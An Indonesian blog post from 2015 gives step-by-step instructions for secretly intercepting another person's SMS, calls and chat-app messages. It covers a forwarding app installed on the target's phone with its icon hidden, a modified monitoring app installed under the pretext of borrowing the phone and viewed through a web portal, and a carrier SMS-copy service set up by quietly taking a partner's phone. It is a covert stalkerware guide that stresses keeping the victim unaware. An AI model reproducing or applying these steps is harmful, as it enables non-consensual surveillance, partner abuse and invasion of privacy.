Thursday, April 9, 2015

Aplikasi penyadap sms

Aplikasi penyadap sms, cara gampang Untuk Menyadap SMS & telpon, Perkembangan teknologi semakin hari semakin maju. Terkadang teknologi yang begitu canggih seperti 2 sisi mata uang logam, dpt di pergunakan dengan baik dpt juga di salah gunakan. Serta Salah satu aplikasi yang saat ini paling banyak dicari oleh netter ialah Software aplikasi penyadap sms serta telepon, yang bisa sampean download di bawah ini.Aplikasi software handphone ini dpt di pergunakan untuk menyadap handphone orang lain dan jg untuk mengetahui sms dari target.

Berikut ini beberapa aplikasi android untuk menyadap sms serta telepon Aplikasi penyadap sms HP.




1. SMS Watcher Lite Pro Aplikasi penyadap sms android.

Aplikasi ini berperan khusus untuk menyadap SMS saja, dengan cara mem forward atau mengirimkan kembali SMS yg masuk & keluar dari HP target ke nomor kita.

Caranya... :

1.Download aplikasi SMS Watcher Lite langsung di HP android target lewat google play

2.Setelah download, buka aplikasi ini. ( jangan lupa, aplikasinya di install di HP target yah )

3.Setelah dibuka, aplikasi ini akan meminta password untuk keamanan. Setelah password di isi, masuk ke menu utama SMS Watcher Lite.

4.Di menu utama ada dua bagian, yaitu white list dan forward list ,abaikan white list, tuliskan nomor engkau di forward list. Karna aplikasi ini fungsinya memang sebagai forwarder SMS.

5.Save and Close Application.

Setelah step diatas.. masih ada satu step lagi yg hrs sampean lakukan, yaitu menyembunyikan icon aplikasi ini supaya si target ga curiga.

Caranya sampean menggunakan Launcher kan? nah pada home screen kamu tekan menu > kemudian pilih Preferences > lalu Aplication Hide > Kemudian checklist aplikasi mana yg mau anda hide.

Download langsung SMS Watcher Lite langsung dari google play DISINI

2. Children Tracker 2.5 XDA version.

Kenapa XDA version? lantaran versi XDA lebih komplit fiturnya, jika dibandingkan dengan versi nya di playstore karena terkendala oleh kebijakan google itu sendiri.

Dengan Children Tracker 2.5 XDA version kami bisa meyadap : Log panggilan

SMS Keluar Masuk

BBM (Black Berry Messenger)

Whatsapp

Viber

Facebook Messenger

Lines

Hangout

Kik messenger

Chrome

Firefox

Nimbuzz

Zalo

caranya :

Langkah Pertama,Download dan Install Children Tracker di Android Target yg akn kami SMS sadap.

Terus caranya bagaimana?? Intinya, lw harus menginstall aplikasi Children Tracker 2.5 XDA Version ini di hp target,pake modus sedikitlah pura-pura minjem hp buat main game atau apalah,kalo dah biasa bo`ong mah gampang...hehehe.

Langkah Kedua,Setelah install di hp target buat akun kamu, dengan mengisi E-mail. Setelah Itu cek E-mail kamu, untuk memperoleh Webpage Link Konfirmasi beserta Password yang bisa digunakan untuk login. cara sadap hp

Langkah Ketiga,Sudah di install dan registrasi,untuk mulai memantau sekarang nte dapat mencoba akses data-data hp terget via web, visit https://tracker.safet.me/login.

Login menggunakan akun yang anda buat,ini adalah Portal situs Resmi dari Aplikasi Children Tracker, dimana didalamnya kami bisa memantau segala aktifitas korban. tips sadap hp

Langkah Terakhir, Engkau jg dpt mengetahui lokasi terakhir serta posisi korban tanpa menggunakan fitur GPS, menurut ane ini sangat menarik bukan? Mengingat jika anda mengaktifkan GPS secara diam-diam, pasti akan ketahuan, tetapi ngga dengan aplikasi ini.Dan asiknya kita dpt menyembunyikan icon app, sehingga target tidak akan gampang curiga.Untuk akses aplikasi chat, device target mesti telah rooted ya!

Download Children Tracker 2.5 XDA version. DISINI3.Provider Telkomsel

Cara yg pertama yang akan aku bagikan adalah cara sadap sms dgn Provider telkomsel (Simpati AS Kartu Halo) Perlu engkau catat sebelumnya jika menggunakan cara ini ada harga yang akn timbul dan di bebankan kepada org atau pasangan yang engkau sadap sebesar Rp.2000.

Jika tidak ada kendala dengan biaya yang akn timbul silahkan baca lebih lanjut tahap demi tahap.

1. Langkah Pertama yg hrs kamu lakukan adalah mengambil handphone pasangan yang akn engkau sadap upayakan pasangan engkau tak curiga saat lw mengambil handphonenya tapi alangkah baiknya jika pasangan anda tidak tahu bahwa HPnya sedang engkau ambil.tips sadap sms hp

2. Setelah langkah pertama berjalan dgn mulus silahkan sampean melakukan SMS ke no 2255 dengan format sms MENU & kirim langsung.

3. Setelah pesan terkirim ke no 2255 kamu akn mendapat balasan sms dengan format Menu berjumlah 6 yang hrs anda pilih salah satu (Silahkan engkau pilih no 4 & kirim kembali Kirim/OK)

4. Tak lama setelah langkah no tiga di lakukan anda akan memperoleh balasan kembali silahkan pilih no 1 utk mengerjakan registrasi.

5. Selanjutnya lw akan memperoleh Balasan terahir yang salah satu isinya Tambah Penerima dan silahkan masukan no handphone sampean atau no yg akn memperoleh copy sms dari pasangan anda atau org yg mau nte pantau.

Itulah beberapa aplikasi software penyadap handphone serta sms yg dpt kita share.semoga dpt membantu bagi yg membutuhkan terima kasih

No comments:

Post a Comment